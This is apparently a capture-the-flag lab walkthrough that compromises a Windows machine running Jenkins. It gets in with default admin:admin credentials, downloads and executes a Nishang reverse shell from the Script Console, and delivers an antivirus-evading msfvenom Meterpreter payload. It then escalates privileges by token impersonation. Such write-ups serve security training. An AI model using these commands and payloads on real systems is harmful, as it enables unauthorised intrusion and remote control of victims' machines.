Step 1: Reconnaissance
:~$ nmap -sV 10.10.219.84
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-04 20:35 IST
Nmap scan report for 10.10.219.84
Host is up (0.19s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
3389/tcp open ssl/ms-wbt-server?
8080/tcp open http Jetty 9.4.z-SNAPSHOT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
The Nmap scan reveals three open ports:
- Port 80 – HTTP service (Microsoft IIS 7.5)
- Port 3389 – RDP (likely not useful at this point)
- Port 8080 – Running Jetty server (possibly hosting Jenkins)
Exploring Port 80
Since port 80 is usually the default web service, let's visit it in the browser:
Unfortunately, there's nothing useful here.
Checking Out Port 8080 (Jenkins)
Given that the Jetty server is running on port 8080 and the version looks outdated, let’s take a look.
Let's try the classic move: default credentials admin:admin.
Bingo! We're in 😎 — call me a genius!
Step 2: Exploitation
While scrolling through the Jenkins interface, I finally found something promising under Manage Jenkins → Script Console.
After experimenting for a bit, I figured out how to run commands. Let’s test it by listing the contents of the C: drive using:
cmd = "cmd.exe /c dir"
println cmd.execute().text
Nice! We got some output. Now let’s move on to getting a reverse shell.
Preparing the Reverse Shell
We'll use Nishang, a collection of PowerShell scripts for exploitation. Clone the repo:
git clone https://github.com/samratashok/nishang
Navigate to the Shells directory:
cd nishang/Shells/
Now, we’ll host the reverse shell script using a simple Python HTTP server:
python3 -m http.server
Meanwhile, set up a Netcat listener on a different port to catch the shell:
nc -lnvp 1234
Executing the Reverse Shell
We’ll download and execute the reverse shell script on the target machine via the Jenkins Script Console:
cmd = "powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port"
println cmd.execute()
Example with my setup:
cmd = "powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.14.127:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.14.127 -Port 1234"
println cmd.execute()
And... boom! Got the reverse shell back:
Step 3: Post Exploitation
User Flag.txt
We begin by retrieving the user.txt file from the compromised system:
cat 'C:\Users\bruce\Desktop\user.txt'
Step 4: Privilege Escalation
Switching to Meterpreter
To make privilege escalation easier and more efficient, let’s upgrade to a Meterpreter shell using a custom payload.
Generate the payload with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<your-ip> LPORT=<your-port> -f exe -o shell-test.exe
This payload uses the x86/shikata_ga_nai encoder to help evade antivirus detection.
Setting Up the Handler
Start Metasploit Framework Console:
msfconsole -q
Configure the handler:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-thm-ip>
set LPORT 5555
run
Delivering the Payload
Now, we need to transfer the shell-test.exe file to the target. From the directory where your payload is saved (e.g., /home/user), run a simple Python server:
python3 -m http.server
On the target (via the reverse shell), download the file:
powershell "(New-Object System.Net.WebClient).DownloadFile('http://<your-thm-ip>:8000/shell-test.exe','shell-test.exe')"
Execute the payload:
Start-Process "shell-test.exe"
Once the Meterpreter shell is received, type:
shell
Privilege Escalation via Token Impersonation
Check current privileges:
whoami /priv
We see SeDebugPrivilege and SeImpersonatePrivilege are enabled — perfect for token impersonation.
Load the incognito module in Meterpreter:
load incognito
If
load incognitofails, tryuse incognitoor ensure your Metasploit is updated.
Press Ctrl+C to exit the shell and return to the Meterpreter prompt.
List available tokens:
list_tokens -g
We can see that the BUILTIN\Administrators token is available.
Impersonate it:
impersonate_token "BUILTIN\\Administrators"
Final Step: Root Flag
Before reading the root flag, let’s migrate to a stable system process for persistence. View running processes:
Choose a stable process and migrate to it:
migrate <PID>
Root Flag.txt
Once you have SYSTEM privileges, retrieve the root flag:
type 'C:\Windows\System32\config\root.txt'